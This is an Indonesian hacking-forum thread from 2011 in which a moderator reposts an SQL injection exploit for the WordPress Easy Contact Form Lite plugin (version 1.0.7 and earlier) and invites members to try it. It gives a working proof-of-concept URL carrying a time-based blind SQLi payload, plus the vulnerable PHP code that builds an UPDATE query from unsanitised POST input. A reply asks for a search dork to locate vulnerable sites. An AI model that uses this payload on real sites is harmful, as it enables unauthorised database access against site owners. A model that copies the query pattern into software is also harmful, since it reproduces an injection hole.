.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi

Go down 
2 posters
PengirimMessage
Black.exe
Global Mod
Global Mod
Black.exe


Jumlah posting : 844
Points : 1491
Reputation : 44
Join date : 08.01.11
Age : 35

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi Empty
PostSubyek: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi   WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi Icon_minitimeThu Aug 18, 2011 4:53 pm

numpang sharing exploit keren aja, hasil nemu di exploit-id WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi 772168924 masih frsh gan exploitnya, monggo di coba...

Quote :
# Exploit Title: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQL Injection Vulnerability
# Date: 2011-08-17
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/easy-contact-form-lite.zip
# Version: 1.0.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php?field_num[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
foreach ($_POST['field_num'] as $position=>$field_id) {

if ($field_id > 0) {
$query = "
UPDATE $settings_table_name
SET position = '".$position."'
WHERE ID = $field_id";
$wpdb->query($query);
}

semoga berguna.
Kembali Ke Atas Go down
nesta
VIP Member
VIP Member
nesta


Jumlah posting : 810
Points : 896
Reputation : 42
Join date : 04.08.11
Age : 37
Lokasi : depan komputer

WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi Empty
PostSubyek: Re: WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi   WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi Icon_minitimeThu Aug 18, 2011 6:00 pm

404 File not found om....

sekalian ama dorknya ya om WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi 3529815765
Kembali Ke Atas Go down
http://www.hacker-newbie.org
 
WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: